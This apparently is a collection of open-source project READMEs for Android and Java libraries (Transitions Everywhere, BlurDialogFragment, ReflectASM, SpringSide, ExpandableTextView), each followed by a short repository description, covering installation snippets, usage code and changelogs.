Transitions Everywhere ============ Set of extra Transitions on top of [AndroidX Transitions Library][1]. About ============ [Article about transitions and library][2]<br> Originally this library was a full backport of Android Platform's Transitions API.<br> Then all the bug fixes from the library were ported into AndroidX Transitions (previously Support library).<br> Now this lib has minSdk version <b>14</b> (Android 4.0 ICS) and consist of some transitions which are not a part of the official set: 1) Internal Transitions that was marked as @hide in the platform: <b>Recolor</b>, <b>Rotate</b>, <b>ChangeText</b> and <b>Crossfade</b>. 2) Two extra transitions: <b>Scale</b> and <b>Translation</b>.<br><br> Quick start ============ This version should be used if you are specifying 29 (Q) as a `targetSdkVersion`: ```groovy dependencies { implementation "com.andkulikov:transitionseverywhere:2.1.0" } ``` Otherwise, if you specify 29 as `targetSdkVersion` some of the transitions will not work properly. Instead of the reflection calls this version uses the new public methods added in API Level 29. It is based on <b>androidx.transition:transition:1.2.0</b>. Previous version if you are not yet on 29 (Q) SDK: ```groovy dependencies { implementation "com.andkulikov:transitionseverywhere:2.0.0" } ``` This version is based on <b>androidx.transition:transition:1.1.0</b>. Migration from 1.x guide ============ 1) Migrate to <b>AndroidX</b>! Support libraries are not updating anymore, to get all the bug fixes you have to use AndroidX transitions. 2) Replace imports from <b>com.transitionseverywhere.</b> to <b>androidx.transition.</b> for all the classes which are a part of the AndroidX lib. 3) If you were using <b>Transition.TransitionListenerAdapter</b> class use <b>TransitionListenerAdapter</b> now. 4) Instead of <b>TransitionManager.setTransitionName()</b> use <b>ViewCompat.setTransitionName()</b>. 5) If you were inflating transitions via xml move your files from <b>anim</b> folder to <b>transition</b> and use <b>android:</b> namespace instead of <b>app:</b> 6) Some setters in AndroidX transitions are not following the builder pattern, please rewrite this usages with introducing a helper variable if you encounter the issue. 7) Instead of <b>TranslationTransition</b> use <b>Translation</b>. Articles about the version 1.x ============ [Article about transitions and library][2]<br> [Russian version][3]<br> Chinese: [version 1][5], [version 2][6]<br> [Changelog for version 1.x][4] ============ [1]: https://developer.android.com/reference/androidx/transition/package-summary [2]: https://medium.com/@andkulikov/animate-all-the-things-transitions-in-android-914af5477d50 [3]: http://habrahabr.ru/post/243363/ [4]: https://github.com/andkulikov/Transitions-Everywhere/blob/master/library(1.x)/CHANGELOG.md [5]: https://yanlu.me/animate-all-the-things-transitions-in-android/ [6]: http://www.jianshu.com/p/98f2ec280945 [7]: https://medium.com/@andkulikov/support-library-for-transitions-overview-and-comparison-c41be713cf8c
Library project to display DialogFragment with a blur effect.
BlurDialogFragment ================== This project allows to display DialogFragment with a burring effect behind. The blurring part is achieved through FastBlur algorithm thanks to the impressive work of Pavlo Dudka (cf [Special Thanks](https://github.com/tvbarthel/BlurDialogFragment/#special-thanks-to-)). [![Maven Central](http://img.shields.io/maven-central/v/fr.tvbarthel.blurdialogfragment/lib.svg)](http://search.maven.org/#search%7Cga%7C1%7Cblurdialogfragment) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-BlurDialogFragment-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1064) * [Sample app](#sample-app) * [Gradle dependency](#gradle-dependency) * [Example](#example) * [Use RenderScript in Your Project] (#use-renderscript-in-your-project) * [Simple usage using inheritance](#simple-usage-using-inheritance) * [Customize your blurring effect](#customize-your-blurring-effect) * [Avoiding inheritance](#avoiding-inheritance) * [Benchmark](#benchmark) * [Known bugs](#known-bugs) * [RenderScript or not RenderScript](#renderscript-or-not-renderscript) * [Change logs](#change-logs) * [Contributing](#contributing) * [Credits](#credits) * [License](#license) * [Special Thanks](#special-thanks-to-) Sample app ======= [Download the sample app on the Google Play store.](https://play.google.com/store/apps/details?id=fr.tvbarthel.lib.blurdialogfragment.sample) Gradle dependency ======= Since the library is promoted on maven central, just add a new gradle dependency : ```groovy compile 'fr.tvbarthel.blurdialogfragment:lib:2.2.0' ``` Don't forget to check the [Use RenderScript in Your Project] (#use-renderscript-in-your-project) if you're planning to use it. Example ======= Activity with action bar [blurRadius 4, downScaleFactor 5.0] : ![action bar blur](/static/action_bar_blur.png) Fullscreen activity [blurRadius 2, downScaleFactor 8.0] : ![full screen blur](/static/full_screen_blur.png) Use RenderScript in Your Project ====== Simply add this line to your build.gradle ```groovy defaultConfig { ... renderscriptTargetApi 22 renderscriptSupportModeEnabled true ... } ``` Simple usage using inheritance ======= If you are using **android.app.DialogFragment** : extends **BlurDialogFragment**. Play with the blur radius and the down scale factor to obtain the perfect blur. Don't forget to enable log if you want to keep on eye the performance. ```java /** * Simple fragment with blurring effect behind. */ public class SampleDialogFragment extends BlurDialogFragment { } ``` If you are using **android.support.v4.app.DialogFragment** : extends **SupportBlurDialogFragment**. Play with the blur radius and the down scale factor to obtain the perfect blur. Don't forget to enable log in order to keep on eye the performance. ```java /** * Simple fragment with blurring effect behind. */ public class SampleDialogFragment extends SupportBlurDialogFragment { } ``` Customize your blurring effect ====== ```java /** * Simple fragment with a customized blurring effect. */ public class SampleDialogFragment extends BlurDialogFragment { @Override public void onCreate(Bundle savedInstanceState) { ... } @Override protected float getDownScaleFactor() { // Allow to customize the down scale factor. return 5.0; } @Override protected int getBlurRadius() { // Allow to customize the blur radius factor. return 7; } @Override protected boolean isActionBarBlurred() { // Enable or disable the blur effect on the action bar. // Disabled by default. return true; } @Override protected boolean isDimmingEnable() { // Enable or disable the dimming effect. // Disabled by default. return true; } @Override protected boolean isRenderScriptEnable() { // Enable or disable the use of RenderScript for blurring effect // Disabled by default. return true; } @Override protected boolean isDebugEnable() { // Enable or disable debug mode. // False by default. return true; } ... ``` Default values are set to : ```java /** * Since image is going to be blurred, we don't care about resolution. * Down scale factor to reduce blurring time and memory allocation. */ static final float DEFAULT_BLUR_DOWN_SCALE_FACTOR = 4.0f; /** * Radius used to blur the background */ static final int DEFAULT_BLUR_RADIUS = 8; /** * Default dimming policy. */ static final boolean DEFAULT_DIMMING_POLICY = false; /** * Default debug policy. */ static final boolean DEFAULT_DEBUG_POLICY = false; /** * Default action bar blurred policy. */ static final boolean DEFAULT_ACTION_BAR_BLUR = false; /** * Default use of RenderScript. */ static final boolean DEFAULT_USE_RENDERSCRIPT = false; ``` Avoiding inheritance ======= If you want to **avoid inheritance**, use directly the **BlurEngine**. Don't forget to link the engine to the lifecycle of your DialogFragment. ```java /** * Your blur fragment directly using BlurEngine. */ public class SampleDialogFragment extends MyCustomDialogFragment { /** * Engine used to blur. */ private BlurDialogEngine mBlurEngine; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); mBlurEngine = new BlurDialogEngine(getActivity()); mBlurEngine.setBlurRadius(8); mBlurEngine.setDownScaleFactor(8f); mBlurEngine.debug(true); mBlurEngine.setBlurActionBar(true); mBlurEngine.setUseRenderScript(true); } @Override public void onResume() { super.onResume(); mBlurEngine.onResume(getRetainInstance()); } @Override public void onDismiss(DialogInterface dialog) { super.onDismiss(dialog); mBlurEngine.onDismiss(); } @Override public void onDestroy() { super.onDestroy(); mBlurEngine.onDetach(); } @Override public void onDestroyView() { if (getDialog() != null) { getDialog().setDismissMessage(null); } super.onDestroyView(); } ... } ``` Benchmark ======= # Benchmark outdated. Please refer to the debug option of the sample in order to compare FastBlur and RenderScript. We used a Nexus 5 running a 4.4.4 stock rom for this bench. Down scale factor 8.0 & Blur Radius 8 : [Screenshot](/static/blur_8.0_8.png) ```javascript Radius : 8 Down Scale Factor : 8.0 Blurred achieved in : 18 ms Allocation : 4320ko (screen capture) + 270ko (FastBlur) ``` Down scale factor 6.0 & Blur Radius 12 : [Screenshot](/static/blur_6.0_12.png) ```javascript Radius : 12 Down Scale Factor : 6.0 Blurred achieved in : 31 ms Allocation : 4320ko (screen capture) + 360ko (FastBlur) ``` Down scale factor 4.0 & Blur Radius 20 : [Screenshot](/static/blur_4.0_20.png) ```javascript Radius : 20 Down Scale Factor : 4.0 Blurred achieved in : 75 ms Allocation : 4320ko (screen capture) + 540ko (FastBlur) ``` Known bugs ======= * Wrong top offset when using the following line in application Theme : ```xml <item name="android:windowActionBarOverlay">true</item> ``` RenderScript or not RenderScript ======= Thanks to [amasciul](https://github.com/amasciul) blurring effect can now be achieved using ScriptIntrinsicBlur (v1.1.0). Find more information on the [memory trace](http://tvbarthel.github.io/blur-dialog-fragment.html) and on the [execution time](http://trickyandroid.com/advanced-blurring-techniques/#comment-1557039595). Change logs ======= * 2.2.0 : Fix preDrawListener registration when there was no certitude that onPreDraw will be called thanks to [Serkan Modoğlu](https://github.com/sekomod) and [Mark Mooibroek](https://github.com/markmooibroek) reports. * 2.1.6 : Fix orientation change as well as retainInstance thanks to [IskuhiSargsyan](https://github.com/IskuhiSargsyan) report and tweak FastBlur implementation to avoid the allocation of 3 additional arrays for RGB channels thanks to [sh1](https://disqus.com/by/sh1sh1sh1/) feedback. * 2.1.5 : Minor fixes thanks to [Edward S](https://github.com/edward-s) and [Tommy Chan](https://github.com/tommytcchan). * 2.1.4 : Fix NPE during the blurring process thanks to [Anth06ny](https://github.com/Anth06ny), [jacobtabak](https://github.com/jacobtabak) and [serega2593](https://github.com/serega2593) reports. * 2.1.3 : Remove unused resources thanks to [ligol](https://github.com/ligol) report. * 2.1.2 : Rework support of translucent status bar thanks to [wangsai-silence](https://github.com/wangsai-silence) report. * 2.1.1 : Fix usage without renderscript as VerifyError was fired. * 2.1.0 : Support AppCompatActivity and fix several bugs thanks to [jacobtabak](https://github.com/jacobtabak). * 2.0.1 : BlurEngine is back again (restore "avoiding inheritance" usage, thanks to [sergiopantoja](https://github.com/sergiopantoja) report). * 2.0.0 : Min SDK 9+, don't forget to check the above section "Use RenderScript in Your Project". (thanks to [ligol](https://github.com/ligol)). * 1.1.0 : Allow to use RenderScript (thank to [amasciul](https://github.com/amasciul)). * 1.0.0 : Animate blurring effect, support tablet, tweak nav bar offset and reduce memory allocation. * 0.1.2 : Fix bottom offset introduce by the navigation bar on Lollipop. * 0.1.1 : Fix top offset when using Toolbar. * 0.1.0 : Support appcompat-v7:21. * 0.0.9 : Change default blur radius (8) and default down scale factor (4). * 0.0.8 : Fix NoClassDefFound. * 0.0.7 : Avoid using inheritance through BlurDialogEngine if needed. Contributing ======= Contributions are welcome (: You can contribute through GitHub by forking the repository and sending a pull request. When submitting code, please make every effort to follow existing conventions and style in order to keep the code as readable as possible. Please also make sure your code fit these convention by running gradlew check. Credits ======== Credits go to Thomas Barthélémy [https://github.com/tbarthel-fr](https://github.com/tbarthel-fr) and Vincent Barthélémy [https://github.com/vbarthel-fr](https://github.com/vbarthel-fr). License ===================== ``` Copyright (C) 2014 tvbarthel Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ``` Special Thanks to ... ======== Pavlo Dudka [https://github.com/paveldudka/](https://github.com/paveldudka/) , for his impressive article on [Advanced blurring techniques](http://trickyandroid.com/advanced-blurring-techniques/). Vincent Brison [https://github.com/vincentbrison](https://github.com/vincentbrison) , for his early day support. Alexandre Masciulli [https://github.com/amasciul](https://github.com/amasciul) , for the integration of RenderScript.
High performance Java reflection
![](https://raw.github.com/wiki/EsotericSoftware/reflectasm/images/logo.png) [![Build Status](https://travis-ci.org/EsotericSoftware/reflectasm.png?branch=master)](https://travis-ci.org/EsotericSoftware/reflectasm) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.esotericsoftware/reflectasm/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.esotericsoftware%22%20AND%20a%3Areflectasm) Please use the [ReflectASM discussion group](http://groups.google.com/group/reflectasm-users) for support. ## Overview ReflectASM is a very small Java library that provides high performance reflection by using code generation. An access class is generated to set/get fields, call methods, or create a new instance. The access class uses bytecode rather than Java's reflection, so it is much faster. It can also access primitive fields via bytecode to avoid boxing. ## Performance ![](http://chart.apis.google.com/chart?chma=100&chtt=Field%20Set/Get&chs=700x62&chd=t:1402081,11339107&chds=0,11339107&chxl=0:|Java%20Reflection|FieldAccess&cht=bhg&chbh=10&chxt=y&chco=6600FF) ![](http://chart.apis.google.com/chart?chma=100&chtt=Method%20Call&chs=700x62&chd=t:97390,208750&chds=0,208750&chxl=0:|Java%20Reflection|MethodAccess&cht=bhg&chbh=10&chxt=y&chco=6600AA) ![](http://chart.apis.google.com/chart?chma=100&chtt=Constructor&chs=700x62&chd=t:2853063,5828993&chds=0,5828993&chxl=0:|Java%20Reflection|ConstructorAccess&cht=bhg&chbh=10&chxt=y&chco=660066) The source code for these benchmarks is included in the project. The above charts were generated on Oracle's Java 7u3, server VM. ## Installation To use reflectasm with maven, please use the following snippet in your pom.xml ```xml <dependency> <groupId>com.esotericsoftware</groupId> <artifactId>reflectasm</artifactId> <version>1.11.9</version> </dependency> ``` ## Usage Method reflection with ReflectASM: ```java SomeClass someObject = ... MethodAccess access = MethodAccess.get(SomeClass.class); access.invoke(someObject, "setName", "Awesome McLovin"); String name = (String)access.invoke(someObject, "getName"); ``` Field reflection with ReflectASM: ```java SomeClass someObject = ... FieldAccess access = FieldAccess.get(SomeClass.class); access.set(someObject, "name", "Awesome McLovin"); String name = (String)access.get(someObject, "name"); ``` Constructor reflection with ReflectASM: ```java ConstructorAccess<SomeClass> access = ConstructorAccess.get(SomeClass.class); SomeClass someObject = access.newInstance(); ``` ## Avoiding Name Lookup For maximum performance when methods or fields are accessed repeatedly, the method or field index should be used instead of the name: ```java SomeClass someObject = ... MethodAccess access = MethodAccess.get(SomeClass.class); int addNameIndex = access.getIndex("addName"); for (String name : names) access.invoke(someObject, addNameIndex, "Awesome McLovin"); ``` Iterate all fields: ```java FieldAccess access = FieldAccess.get(SomeClass.class); for(int i = 0, n = access.getFieldCount(); i < n; i++) { access.set(instanceObject, i, valueToPut); } ``` ## Visibility ReflectASM can always access public members. An attempt is made to define access classes in the same classloader (using setAccessible) and package as the accessed class. If the security manager allows setAccessible to succeed, then protected and default access (package private) members can be accessed. If setAccessible fails, no exception is thrown, but only public members can be accessed. Private members can never be accessed. ## Exceptions Stack traces when using ReflectASM are a bit cleaner. Here is Java's reflection calling a method that throws a RuntimeException: ``` Exception in thread "main" java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at com.example.SomeCallingCode.doit(SomeCallingCode.java:22) Caused by: java.lang.RuntimeException at com.example.SomeClass.someMethod(SomeClass.java:48) ... 5 more ``` Here is the same but when ReflectASM is used: ``` Exception in thread "main" java.lang.RuntimeException at com.example.SomeClass.someMethod(SomeClass.java:48) at com.example.SomeClassMethodAccess.invoke(Unknown Source) at com.example.SomeCallingCode.doit(SomeCallingCode.java:22) ``` If ReflectASM is used to invoke code that throws a checked exception, the checked exception is thrown. Because it is a compilation error to use try/catch with a checked exception around code that doesn't declare that exception as being thrown, you must catch Exception if you care about catching a checked exception in code you invoke with ReflectASM.
A Spring Framework based, pragmatic style JavaEE application reference architecture.
### 最新开源: [VJTools-唯品会Java核心项目](https://github.com/vipshop/vjtools) # SpringSide [![Build Status](https://api.travis-ci.org/springside/springside4.png?branch=master)](https://travis-ci.org/springside/springside4/) SpringSide是以Spring Framework为核心的,Pragmatic风格的JavaEE应用参考示例,是JavaEE世界中的主流技术选型,最佳实践的总结与演示。 1. Utils - 性能与易用性兼顾的Java基础库,综合各门各派的大成之作(近期重点). 2. BootApi - 基于Spring Boot的Web Service应用, 可以用于SOA服务,或Ajax页面的后台. 3. BootWeb - 基于Spring Boot的Web应用, 典型的增删改查管理(未开始). 4. Showcase - 更多的示例. ## 主要用例 全部示例以一个P2P图书馆展开,P2P图书馆避免了中央式图书馆所需的场地和图书管理员,大家把图书登记在应用里互相借阅。 ## 快速开始 (JDK7.0+) 1. 运行根目录下的quick-start.sh 或 quick-start.bat * 将modules安装到本地maven仓库 * 以开发模式启动BootApi应用 2. 访问 http://localhost:8080/,按上面的提示体验。 ------------------------------- Offical Site: http://springside.io(域名过期) Document: https://github.com/springside/springside4/wiki
expandabletextview textview
# ExpandableTextView **实现类似微博内容,@用户,链接高亮,@用户和链接可点击跳转,可展开和收回的TextView。觉得好用别忘了star哦,你的star是对我最大的激励** ### 全平台国际化话翻译解决方案 项目国际化翻译解决方案,支持Android、iOS、Flutter、前端Vue、后端PHP等等,点几下按钮就能实现翻译内容的自动抓取和翻译后文件的自动生成,适合各类场景下的国际化需求。详情请查看:https://github.com/MZCretin/Eva-Translate 欢迎star ------- ### [需求解决系列之-【系列工具概览】](https://juejin.im/post/5ed6174f51882542fb06d850) 此系列是大道至简的起始,将一系列简单恶心的操作封装起来,框架么,可以败絮其中,但一定要金絮其外! ### 快速使用 Gradle: ``` implementation 'com.github.MZCretin:ExpandableTextView:v1.6.1' ``` // if u use AndroidX, use the following ``` implementation 'com.github.MZCretin:ExpandableTextView:v1.6.1-x' ``` ### 更新日志 + 2019-07-04 12:06:06更新,如果你需要监听展开和回收的时间监听,但是不需要控件真正的执行展开和回收操作,你可以在添加展开和收回操作的时候置顶是否需要真正执行展开和回收操作,具体效果可以参考效果图第2条的第二个,依赖版本请使用tag版本v1.6.1,[查看说明](#v1612019-07-04-120205-更新了如下特性-版本v161可以正常使用) ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.6.1' ``` + 2019-05-20 15:14:04更新,如果你需要展示链接但是不想让链接自动转换成"网页链接"的形式,你可以禁用自动转换功能;如果你希望知道是否满足展开/收起的条件,添加一个监听就好了,依赖版本请使用tag版本1.6.0,[查看说明](#v162019-05-20-151910-更新了如下特性-版本v16可以正常使用) ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.6.0' ``` + 2019-03-14 10:25:57更新,修复在有些手机上偶尔会出现白屏,加载不出内容的情况,依赖版本请使用tag版本1.5.3 ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.5.3' ``` + 2018-10-09 17:20:45 更新,新增对展开和回收的点击事件监听,依赖版本请使用tag版本v1.5.2 ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.5.2' ``` + 2018-09-28 09:37:28 更新,优化了将"展开"和"收回"固定最右显示时中间空格数量的计算方式,依赖版本请使用tag版本v1.5.1,[查看说明](#新特性额外说明) ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.5.1' ``` + 2018-09-27 09:18:14 更新 + 修复了不添加事件监听,点击链接会直接打开百度页面; + 在demo中添加自定义设置显示文本的功能,您可以自己设置需要显示的文本,然后查看对应的显示效果; + 新增了"展开"和"收回"按钮始终居右的功能,具体效果请查看效果图的第9条,依赖版本请使用tag版本v1.5,[查看说明](#新特性额外说明) ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.5' ``` + 2018-09-22 23:32:16 更新,新增自定义规则解析,具体效果请查看效果图的第10条,依赖版本请使用tag版本v1.4,[查看说明](#新特性额外说明) ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.4' ``` + 2018-09-21 11:51:24 更新,优化了demo的代码逻辑和注释 + 2018-09-21 08:45:13 更新,修复了自定义设置展开和收回内容无效的问题,依赖请使用tag版本v1.3.1 ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.3.1' ``` + 2018-09-20 16:31:13 更新 + 一、提供了在RecyclerView中使用的时候,对之前状态的保存的功能支持,[查看说明](#新特性额外说明); + 二、新增对@用户和链接的处理,用户可以设置不对这些内容进行识别,仅仅使用展开和收回功能; + 三、优化的demo的效果,请大家重新下载apk进行体验。 + 四、如果你没有设置对链接的监听,会默认调用系统浏览器打开链接 + 五、支持语言国际化 + 六、最新版请使用v1.3 + 2018-09-03 17:39:56 修复一些bug,链接sheSpan位置错误,未生成release,等待下次修复其他bug一起打tag依赖包,使用请本地依赖使用 + 2018-08-31 17:31:56 优化设置padding对宽度造成的影响,依赖请使用tag版本v1.2 ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.2' ``` + 2018-08-31 11:21:22 在V1.0的基础上进行了优化,依赖请使用tag版本v1.1 ```java implementation 'com.github.MZCretin:ExpandableTextView:v1.1' ``` ### 实现效果: <img src="./extra/demo.jpg"/> #### 下面是RecyclerView中的样式,可以保留之前展开和收回的状态 <img src="./extra/demo_gif.gif"/> ### 使用方式: #### Step 1. Add the JitPack repository to your build file Add it in your root build.gradle at the end of repositories: ``` allprojects { repositories { ... maven { url 'https://jitpack.io' } } } ``` #### Step 2. Add the dependency ``` dependencies { implementation 'com.github.MZCretin:ExpandableTextView:请使用最新版本' } ``` ### demo下载 [Demo下载](https://raw.githubusercontent.com/MZCretin/ExpandableTextView/master/extra/demo.apk) 扫描二维码下载: <img src="./extra/erweima.png"/> ### 代码说明 + 以下属性都可以在xml中设置 ```xml <!--保留的行数--> <attr name="ep_max_line" format="integer" /> <!--是否需要展开--> <attr name="ep_need_expand" format="boolean" /> <!--是否需要收起 这个是建立在开启展开的基础上的--> <attr name="ep_need_contract" format="boolean" /> <!--是否需要@用户 --> <attr name="ep_need_mention" format="boolean" /> <!--是否需要对链接进行处理 --> <attr name="ep_need_link" format="boolean" /> <!--是否需要动画--> <attr name="ep_need_animation" format="boolean" /> <!--是否需要将连接转换成网页链接显示 默认为true--> <attr name="ep_need_convert_url" format="boolean" /> <!--是否需要自定义规则--> <attr name="ep_need_self" format="boolean" /> <!--收起的文案--> <attr name="ep_contract_text" format="string" /> <!--展开的文案--> <attr name="ep_expand_text" format="string" /> <!--展开的文字的颜色--> <attr name="ep_expand_color" format="color" /> <!--收起的文字的颜色--> <attr name="ep_contract_color" format="color" /> <!--在收回和展开前面添加的内容的字体颜色--> <attr name="ep_end_color" format="color" /> <!--链接的文字的颜色--> <attr name="ep_link_color" format="color" /> <!--@用户的文字的颜色--> <attr name="ep_mention_color" format="color" /> <!--自定义规则的文字的颜色--> <attr name="ep_self_color" format="color" /> <!--链接的图标--> <attr name="ep_link_res" format="reference"/> <!--是否需要永远将展开或者收回放置在最后边--> <attr name="ep_need_always_showright" format="boolean" /> //布局文件中使用 可选 也可以在代码中设置 <com.ctetin.expandabletextviewlibrary.ExpandableTextView android:id="@+id/ep_01" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_margin="15dp" android:lineSpacingExtra="4dp" android:textSize="14sp" <!--开始展开的行数 --> app:ep_max_line="4" <!--是否需要对链接进行识别--> app:ep_need_link="true" <!--是否需要对@用户进行识别--> app:ep_need_mention="true" <!--是否需要收回功能--> app:ep_need_contract="true" <!--是否需要展开和收回的动画--> app:ep_need_animation="true" <!--展开文字的颜色--> app:ep_expand_color="@color/colorAccent" <!--收回的文字描述--> app:ep_contract_text="收回" <!--在展开前可添加tips tips的文字颜色--> app:ep_end_color="@color/colorAccent" <!--展开的文字描述--> app:ep_expand_text="展开" <!--被识别出来的链接的颜色--> app:ep_link_color="@color/colorAccent" <!--被识别出来的链接的前面的图标资源--> app:ep_link_res="@color/colorAccent" <!--展开的文字的颜色--> app:ep_contract_color="@color/colorAccent" <!--@用户的文字的颜色--> app:ep_mention_color="@color/colorAccent" <!--是否需要将连接转换成网页链接显示--> app:ep_need_convert_url="false" <!--是否需要自定义规则--> app:ep_need_self="true" <!--自定义规则的文字的颜色--> app:ep_self_color="@color/colorAccent" <!--是否需要永远将展开或者收回放置在最后边--> app:ep_need_always_showright="true" <!--是否需要展开功能--> app:ep_need_expand="false" /> ``` + java代码 ```java /** * 正常的使用 */ ExpandableTextView expandableTextView = findViewById(R.id.ep_01); //需要显示的内容 String yourText = " 我所认识的中国,强大、友好。@奥特曼 “一带一路”经济带带动了沿线国家的经济发展,促进我国与他国的友好往来和贸易发展,可谓“双赢”。http://www.baidu.com 自古以来,中国以和平、友好的面孔示人。汉武帝派张骞出使西域,开辟丝绸之路,增进与西域各国的友好往来。http://www.baidu.com 胡麻、胡豆、香料等食材也随之传入中国,汇集于中华美食。@RNG 漠漠古道,驼铃阵阵,这条路奠定了“一带一路”的基础,让世界认识了中国。"; //将内容设置给控件 expandableTextView.setContent(yourText); //xml中的属性也可以通过代码设置 比如 expandableTextView.setmNeedExpend(true); //还有很多。。。。 //添加点击监听 expandableTextView.setLinkClickListener(new ExpandableTextView.OnLinkClickListener() { @Override public void onLinkClickListener(LinkType linkType, String content,String selfContent) { //根据类型去判断 if (type.equals(LinkType.LINK_TYPE)) { Toast.makeText(MainActivity.this, "你点击了链接 内容是:" + content, Toast.LENGTH_SHORT).show(); } else if (type.equals(LinkType.MENTION_TYPE)) { Toast.makeText(MainActivity.this, "你点击了@用户 内容是:" + content, Toast.LENGTH_SHORT).show(); } else if (type.equals(LinkType.SELF)) { Toast.makeText(MainActivity.this, "你点击了自定义规则 内容是:" + content + " " + selfContent, Toast.LENGTH_SHORT).show(); } } }); //添加展开和收回操作 expandableTextView.setExpandOrContractClickListener(type -> { if (type.equals(StatusType.STATUS_CONTRACT)) { Toast.makeText(MainActivity.this, "收回操作", Toast.LENGTH_SHORT).show(); } else { Toast.makeText(MainActivity.this, "展开操作", Toast.LENGTH_SHORT).show(); } }); //监听是否初始化完成 在这里可以获取是否支持展开/收回 expandableTextView.setOnGetLineCountListener(new ExpandableTextView.OnGetLineCountListener() { @Override public void onGetLineCount(int lineCount, boolean canExpand) { Toast.makeText(MainActivity.this, "行数:" + lineCount + " 是否满足展开条件:" + canExpand, Toast.LENGTH_SHORT).show(); } }); //添加展开和收回操作 只触发点击 不真正触发展开和收回操作 expandableTextView.setExpandOrContractClickListener(type -> { if (type.equals(StatusType.STATUS_CONTRACT)) { Toast.makeText(MainActivity.this, "收回操作,不真正触发收回操作", Toast.LENGTH_SHORT).show(); } else { Toast.makeText(MainActivity.this, "展开操作,不真正触发展开操作", Toast.LENGTH_SHORT).show(); } },false); ``` ### 新特性额外说明 ### V1.6.1:2019-07-04 12:02:05 更新了如下特性 版本v1.6.1+可以正常使用 如果你需要监听展开和回收的时间监听,但是不需要控件真正的执行展开和回收操作,你可以在添加展开和收回操作的时候置顶是否需要真正执行展开和回收操作,具体效果可以参考效果图第2条的第二个控件效果: ```java //添加展开和收回操作 只触发点击 不真正触发展开和收回操作 expandableTextView.setExpandOrContractClickListener(type -> { if (type.equals(StatusType.STATUS_CONTRACT)) { Toast.makeText(MainActivity.this, "收回操作,不真正触发收回操作", Toast.LENGTH_SHORT).show(); } else { Toast.makeText(MainActivity.this, "展开操作,不真正触发展开操作", Toast.LENGTH_SHORT).show(); } },false); ``` ### V1.6:2019-05-20 15:19:10 更新了如下特性 版本v1.6+可以正常使用 如果你需要展示链接但是不想让链接自动转换成"网页链接"的形式,你可以禁用自动转换功能,具体效果可以参考效果图第11条;如果你希望知道是否满足展开/收起的条件,添加一个监听就好了: ```java //监听是否初始化完成 在这里可以获取是否支持展开/收回 views[10].setOnGetLineCountListener(new ExpandableTextView.OnGetLineCountListener() { @Override public void onGetLineCount(int lineCount, boolean canExpand) { Toast.makeText(MainActivity.this, "行数:" + lineCount + " 是否满足展开条件:" + canExpand, Toast.LENGTH_SHORT).show(); } }); ``` ### V1.5: 2018-09-27 09:20:28 更新了如下特性 版本v1.5+可以正常使用 如果你需要将"展开"和"收回"始终居右显示,你需要开启它,具体效果可以参考效果图第9条 ``` //需要先开启始终靠右显示的功能 views[8].setNeedAlwaysShowRight(true); //或者在xml中开启 app:ep_need_always_showright="true" ``` ### V1.4:2018-09-22 23:32:16 更新了如下特性 版本v1.4+可以正常使用 如果你觉得目前@用户和网页链接两种形式并不能完全满足你的业务,那么我提供了一个新的自定义规则给你,让你可以更加灵活的去适应自己的业务。 比如上面实现效果的第9条中,我们通过自定义规则对文字中的"--习大大"和"Github地址"进行了自定义规则,让其高亮显示并且可以添加触发相应的事件。 具体做法是: * 在一段文字中将你需要处理的文字做上特殊标记,,标记的规则就是\[显示的内容\](动作),这个标记的规则可以交给后台给你处理,或者你自己处理也可以。 * 比如上文中的"Github地址",那么标记后就是这样的 \[Github地址\]\( https://github.com/MZCretin/ExpandableTextView ),这样在控件中显示的就只是Github地址,可以点击,当点击之后,会将"显示的内容"和"动作"都通过接口回调的方式回传给调用者自己处理; * 再比如上文中的"--习大大",那么标记后就是这样的 \[--习大大\](schema_jump_userinfo),这样控件中只会显示"--习大大",然后根据后面的动作去做处理,比如这是一个用户,可以跳转到这个用户的个人详情页面。 * 默认不会对自定义规则进行解析,如需开启,请开启此功能: ``` <!--是否需要自定义规则--> app:ep_need_self="true" ``` ### V1.3:2018-09-20 16:31:13 更新了如下特性 版本v1.3+可以正常使用 如果你希望在RecyclerView(或者ListView)中使用,请认真阅读demo中在RecyclerView中的使用,细节都在注释中。 如果你需要在列表中保留之前的展开或收回状态,特殊说明的有以下几点: * 一、实现 ExpandableStatusFix * 二、在你的model中定义一个 private StatusType status; * 三、实现对应的方法,将你刚刚定义的status返回, * 四、并在给ExpandableTextView设置内容之前,调用bind方法 ### 实现思路讲解 **简书:** [【需求解决系列之三】Android 自定义可展开收回的ExpandableTextView](https://www.jianshu.com/p/5519fbab6907) **掘金:** [【需求解决系列之三】Android 自定义可展开收回的ExpandableTextView](https://juejin.im/post/5b876a4de51d4571c5137660)
Powerful and user-friendly CI/CD server with high availability, parallel processing, runner auto-scaling
build-automation build-pipelines ci ci-cd continuous-integration devops docker java
